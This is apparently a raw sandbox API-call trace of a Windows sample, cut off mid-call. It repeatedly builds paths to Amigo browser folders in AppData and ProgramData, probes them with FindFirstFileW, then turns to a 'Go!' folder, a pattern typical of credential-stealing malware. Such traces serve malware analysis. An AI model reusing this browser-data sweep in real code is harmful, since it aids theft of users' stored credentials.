ftLastAccessTime.dwHighDateTime=0x1a, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.904] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.904] GetProcessHeap () returned 0x8e0000 [0163.904] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.904] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.904] GetProcessHeap () returned 0x8e0000 [0163.904] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.904] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.904] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.904] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.904] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.904] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.904] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.904] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x7, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.904] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.904] GetProcessHeap () returned 0x8e0000 [0163.904] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.905] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.905] lstrlenW (lpString="\\Amigo") returned 6 [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x68) returned 0x911b98 [0163.905] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.905] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo" [0163.905] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned 51 [0163.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned 51 [0163.905] lstrlenW (lpString="\\*.*") returned 4 [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x909f48 [0163.905] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo" [0163.905] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo\\*.*" [0163.905] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.905] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.905] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.905] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.905] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.905] lstrlenW (lpString="\\Amigo") returned 6 [0163.905] GetProcessHeap () returned 0x8e0000 [0163.905] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x911b98 [0163.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.906] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo" [0163.906] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned 49 [0163.906] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned 49 [0163.906] lstrlenW (lpString="\\*.*") returned 4 [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x909f48 [0163.906] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo" [0163.906] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo\\*.*" [0163.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.906] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.906] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.906] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.906] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.906] lstrlenW (lpString="\\Amigo") returned 6 [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2a) returned 0x914be0 [0163.906] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.906] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Amigo" | out: lpString1="C:\\ProgramData\\Amigo") returned="C:\\ProgramData\\Amigo" [0163.906] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.906] GetProcessHeap () returned 0x8e0000 [0163.906] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.906] lstrlenW (lpString="C:\\ProgramData\\Amigo") returned 20 [0163.907] lstrlenW (lpString="C:\\ProgramData\\Amigo") returned 20 [0163.907] lstrlenW (lpString="\\*.*") returned 4 [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0163.907] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Amigo" | out: lpString1="C:\\ProgramData\\Amigo") returned="C:\\ProgramData\\Amigo" [0163.907] lstrcatW (in: lpString1="C:\\ProgramData\\Amigo", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Amigo\\*.*") returned="C:\\ProgramData\\Amigo\\*.*" [0163.907] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Amigo\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x66001e, ftLastAccessTime.dwHighDateTime=0x1c, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.907] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.907] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.907] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.907] lstrlenW (lpString="\\Amigo") returned 6 [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x68) returned 0x911b98 [0163.907] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0163.907] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo" [0163.907] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned 51 [0163.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned 51 [0163.907] lstrlenW (lpString="\\*.*") returned 4 [0163.907] GetProcessHeap () returned 0x8e0000 [0163.907] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x70) returned 0x909f48 [0163.907] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo" [0163.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo\\*.*" [0163.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Amigo\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x926360, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x926360, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0xa, ftLastWriteTime.dwHighDateTime=0xc, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x909f43, dwReserved1=0x3d00003d, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.908] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.908] GetProcessHeap () returned 0x8e0000 [0163.908] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.908] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.908] GetProcessHeap () returned 0x8e0000 [0163.908] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.908] GetProcessHeap () returned 0x8e0000 [0163.908] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.908] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0163.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0163.908] lstrlenW (lpString="\\Amigo") returned 6 [0163.908] GetProcessHeap () returned 0x8e0000 [0163.908] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x911b98 [0163.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0163.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo" [0163.908] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.908] GetProcessHeap () returned 0x8e0000 [0163.908] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned 49 [0163.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned 49 [0163.908] lstrlenW (lpString="\\*.*") returned 4 [0163.908] GetProcessHeap () returned 0x8e0000 [0163.908] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x6c) returned 0x909f48 [0163.908] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo" [0163.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo\\*.*" [0163.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Amigo\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x909f48, ftCreationTime.dwLowDateTime=0x8e0150, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x8e0000, ftLastAccessTime.dwHighDateTime=0x8e0150, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e0150, nFileSizeLow=0x2000002, dwReserved0=0x58, dwReserved1=0x10000010, cFileName="\r", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.908] VirtualQuery (in: lpAddress=0x909f48, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909f48 | out: hHeap=0x8e0000) returned 1 [0163.909] VirtualQuery (in: lpAddress=0x911b98, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x911000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x16000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x911b98 | out: hHeap=0x8e0000) returned 1 [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.909] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\ProgramData") returned 0x0 [0163.909] lstrlenW (lpString="C:\\ProgramData") returned 14 [0163.909] lstrlenW (lpString="\\Amigo") returned 6 [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x2a) returned 0x914be0 [0163.909] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0163.909] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\Amigo" | out: lpString1="C:\\ProgramData\\Amigo") returned="C:\\ProgramData\\Amigo" [0163.909] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.909] lstrlenW (lpString="C:\\ProgramData\\Amigo") returned 20 [0163.909] lstrlenW (lpString="C:\\ProgramData\\Amigo") returned 20 [0163.909] lstrlenW (lpString="\\*.*") returned 4 [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0163.909] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\Amigo" | out: lpString1="C:\\ProgramData\\Amigo") returned="C:\\ProgramData\\Amigo" [0163.909] lstrcatW (in: lpString1="C:\\ProgramData\\Amigo", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\Amigo\\*.*") returned="C:\\ProgramData\\Amigo\\*.*" [0163.909] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Amigo\\*.*", lpFindFileData=0x2df848 | out: lpFindFileData=0x2df848*(dwFileAttributes=0x7607cb17, ftCreationTime.dwLowDateTime=0xe, ftCreationTime.dwHighDateTime=0x90a94c, ftLastAccessTime.dwLowDateTime=0x5c001e, ftLastAccessTime.dwHighDateTime=0x1e, ftLastWriteTime.dwLowDateTime=0x2df870, ftLastWriteTime.dwHighDateTime=0x7607cb5c, nFileSizeHigh=0x8e75d0, nFileSizeLow=0x0, dwReserved0=0x1e, dwReserved1=0x7607c3d1, cFileName="", cAlternateFileName="勈\x92練-ိ\x07")) returned 0xffffffff [0163.909] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2df804, dwLength=0x1c | out: lpBuffer=0x2df804*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0163.909] VirtualQuery (in: lpAddress=0x914be0, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x914000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.909] GetProcessHeap () returned 0x8e0000 [0163.909] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x914be0 | out: hHeap=0x8e0000) returned 1 [0163.909] GetProcessHeap () returned 0x8e0000 [0163.910] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x208) returned 0x9252c8 [0163.910] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x9252c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0163.910] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0163.910] lstrlenW (lpString="\\Go!") returned 4 [0163.910] GetProcessHeap () returned 0x8e0000 [0163.910] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x64) returned 0x911b98 [0163.910] lstrcatW (in: lpString1="", 